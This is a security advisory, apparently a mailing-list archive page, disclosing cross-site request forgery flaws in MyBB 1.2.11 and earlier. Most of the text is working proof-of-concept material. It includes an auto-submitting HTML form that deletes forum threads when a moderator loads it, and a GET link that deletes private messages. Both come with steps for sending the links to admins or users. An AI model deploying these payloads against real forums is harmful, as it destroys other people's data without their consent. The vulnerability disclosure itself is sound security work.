Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

Agares PhpAutoVideo 2. 21(XSS/RFI) Multiple Remote Vulnerabilities

Clever Copy <=3.0 Multiple Remote Vulnerabilities

From:	nbbn_(at)_gmx.net <nbbn_(at)_gmx.net>
Date:	20.01.2008
Subject:	MyBB 1.2.11 Multiple XSRF Vulnerabilities

####################################################
Founded: 18, January 2008
Founder: nbbn
MyBB Version: 1.2.11 and lower
Type: Multiple XSRF Vulnerabilities
####################################################

####1) Delete Threads XSRF Vulnerabilitie:

<html>
<head>
</head>
<body onLoad="javascript:document.formular.submit()">
<form action="http://localhost/xampp/mybb/moderation.php" method="post"
name="formular">
<input type="hidden" name="action" value="do_multideletethreads" />
<input type="hidden" name="fid" value="2" /> <!-- forumid -->
<input type="hidden" name="threads" value="15|14" /> <!-- threadids -->
<input type="submit"  value="Delete Threads" />
</form>


</body>
</html>

###Poc:
       1. Create a .html file and copy the code into it.
       2. Upload the file and now send the link to an admin or moderator
       3. Done



####2) Delete PM's XSRF Vuln:

This one is only doing via GET and no question:
http://localhost/xampp/mybb/private.php?action=delete&pmid=3


###Poc: (An easy way):

1. Send to a user this link:
http://localhost/xampp/mybb/private.php?action=delete&pmid=3
2. Done